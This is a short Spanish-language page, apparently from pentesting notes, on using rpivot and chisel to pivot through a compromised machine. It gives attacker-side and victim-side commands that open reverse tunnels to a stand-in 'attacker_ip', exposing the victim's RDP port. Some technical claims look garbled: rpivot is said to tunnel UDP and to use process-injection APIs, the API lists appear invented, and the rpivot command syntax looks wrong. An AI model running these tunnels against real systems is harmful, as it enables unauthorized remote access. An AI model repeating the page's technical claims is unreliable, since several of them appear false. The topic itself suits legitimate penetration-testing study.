RPivot y Chisel

1. rpivot

rpivot es una herramienta utilizada para crear túneles de red a través de una máquina comprometida. Usa conexiones inversas y puede crear túneles tanto de TCP como de UDP.

GitHub - klsecservices/rpivot: socks4 reverse proxy for penetration testingGitHub

APIs Utilizadas:

CreateProcess: Para ejecutar procesos y comandos.
CreateRemoteThread: Para inyectar y ejecutar código en procesos remotos.
CreateNamedPipe: Para establecer canales de comunicación entre procesos locales y remotos.

2. chisel

chisel es una herramienta rápida de túneles TCP/UDP escrita en Go que puede ser utilizada para realizar pivoting y redirigir tráfico de red.

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub

APIs Utilizadas:

Socket API (Winsock): Para crear y gestionar sockets de red.
Connect: Para establecer conexiones a sockets remotos.
Bind: Para enlazar sockets locales a puertos específicos.
Listen: Para escuchar en puertos específicos para conexiones entrantes.
Accept: Para aceptar conexiones entrantes en sockets.

Ejemplo de Configuración con rpivot y chisel

1. Uso de rpivot

Comando en la máquina atacante:
```
rpivot -server -bind :8080
```

Comando en la máquina comprometida:

rpivot -client -connect attacker_ip:8080 -local 8081:127.0.0.1:3389

2. Uso de chisel

Comando en la máquina atacante:
```
chisel server -p 8000 --reverse
```

Comando en la máquina comprometida:

chisel client attacker_ip:8000 R:8081:127.0.0.1:3389

AnteriorDoble Pivoting y Triple Pivoting SiguienteFundamentos de Active Directory

Última actualización hace 3 meses